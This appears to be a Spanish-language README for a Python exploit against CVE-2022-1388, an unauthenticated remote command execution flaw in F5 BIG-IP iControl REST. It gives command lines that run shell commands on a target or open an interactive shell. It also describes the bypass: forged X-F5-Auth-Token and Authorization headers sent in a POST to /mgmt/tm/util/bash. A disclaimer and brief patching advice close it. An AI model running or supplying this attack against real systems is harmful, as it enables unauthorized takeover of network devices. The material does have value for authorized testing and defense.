
Este script de Python explota CVE-2022-1388, una vulnerabilidad crítica en F5 BIG-IP iControl REST que permite la ejecución remota de comandos sin autenticación mediante un control de acceso inadecuado y un manejo incorrecto de las cabeceras HTTP.
⚠️ Solo con fines educativos y de investigación de seguridad autorizada. No lo utilices contra sistemas que no poseas o para los que no tengas permiso explícito de prueba.
--shell)python3 cve_2022_1388_exploit.py -u <target_url> -c "<command>"
python3 cve_2022_1388_exploit.py -u https://192.168.1.1 -c "id"
python3 cve_2022_1388_exploit.py -u https://192.168.1.1 -a "root:password" -c "whoami"
python3 cve_2022_1388_exploit.py -u https://192.168.1.1 --shell
El script omite la autenticación configurando cabeceras X-F5-Auth-Token y Authorization falsificadas.
Envía una petición POST a: /mgmt/tm/util/bash
El payload desencadena la ejecución del comando shell especificado.
Actualiza a las versiones parcheadas de F5 BIG-IP según lo recomendado por el aviso de seguridad de F5.
Restringe el acceso a la interfaz iControl REST.
Este script de exploit se proporciona únicamente con fines educativos. El uso es totalmente bajo tu propio riesgo.